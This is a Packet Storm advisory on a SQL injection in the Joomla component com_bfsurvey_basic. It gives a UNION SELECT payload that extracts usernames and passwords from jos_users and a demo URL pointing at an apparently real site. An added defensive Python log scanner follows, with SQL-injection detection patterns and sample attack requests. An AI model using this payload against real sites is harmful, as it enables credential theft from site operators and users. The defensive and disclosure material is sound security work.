Joomla BF Survey Basic SQL Injection

2010-01-04T00:00:00
ID PACKETSTORM:84699
Type packetstorm
Reporter Fl0riX
Modified 2010-01-04T00:00:00

Description

                                        
                                            `  
[+] Joomla Component com_bfsurvey_basic SQL Injection Vulnerability  
  
[+] Author: FL0RiX  
  
[+] Greetz : Wretch-x And All Friends  
  
[+] HomePage : http://oltan.org  
  
[+] Download : http://www.tamlyncreative.com.au/software/index.php/downloads.html?func=download&fileid=24  
  
############################################################################################################################  
  
[+] Exploit:  
  
[+] null/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password)fl0rix,user(),user()/**/from/**/jos_users--  
  
[+] Demo :   
  
[+] http://megasun.de/amie/index.php?option=com_bfsurvey_basic&view=bfsurveybasic&catid=38&Itemid=[EXPLOIT]  
  
############################################################################################################################  
< ---- Note ---- >  
F....N;  
You are a person of truly superior intelligence,  
you can be sure of that, :)  
You are the only lamer who can hack a domain with SQL injection, :)  
You are second to none at finding RFI in ASP,  
But you are the biggest jerk of a lamer I have ever seen :D  
And you can shove these rhymes somewhere ;)  
Lol F....N :)  
< ---- Note Finished ---- >  
  
  
`
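
A defender's check for the request pattern in this advisory, as an added example that is not part of the original advisory or of the component's code: it scans web access logs for requests to com_bfsurvey_basic whose catid or Itemid value is not a plain integer, after URL-decoding and collapsing `/**/` comments. The Apache combined log format, the sample lines and the treatment of both parameters as integer ids are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

COMPONENT = "com_bfsurvey_basic"
NUMERIC_PARAMS = ("catid", "Itemid")  # assumed to carry integer ids, as in the demo URL
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
SQL_TOKENS = re.compile(
    r"\bunion\s+(all\s+)?select\b|\bconcat\s*\(|\bfrom\s+\w+_users\b", re.I)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_url(url):
    """Return [(param, reason)] for suspicious id parameters; [] when clean."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)  # percent-decodes
    if COMPONENT not in query.get("option", []):
        return []  # rule is scoped to this component only
    findings = []
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if re.fullmatch(r"[0-9]+", value):
                continue
            flattened = SQL_COMMENT.sub(" ", value)  # /**/ stands in for spaces
            reason = "sql-tokens" if SQL_TOKENS.search(flattened) else "non-numeric"
            findings.append((name, reason))
    return findings

def scan_log(lines):
    """Return (client, param, reason) for every finding in access-log lines."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m:
            hits += [(m.group(1), p, r) for p, r in inspect_url(m.group(2))]
    return hits

# Constructed sample log lines (documentation addresses, hypothetical requests).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jan/2010:10:00:00 +0000] "GET /index.php?option=com_bfsurvey_basic&view=bfsurveybasic&catid=38&Itemid=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [04/Jan/2010:10:00:05 +0000] "GET /index.php?option=com_bfsurvey_basic&view=bfsurveybasic&catid=38&Itemid=null/**/and/**/1=0/**/union/**/select/**/1,2,3-- HTTP/1.1" 200 5300',
    '198.51.100.7 - - [04/Jan/2010:10:00:09 +0000] "GET /index.php?option=com_bfsurvey_basic&catid=38&Itemid=1%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1 HTTP/1.1" 200 5300',
    '203.0.113.4 - - [04/Jan/2010:10:01:00 +0000] "GET /index.php?option=com_bfsurvey_basic&catid=38x&Itemid=12 HTTP/1.1" 500 310',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Log matching only shows who probed the parameter; the lasting fix is in the component, which should cast these ids to integers before they reach the query.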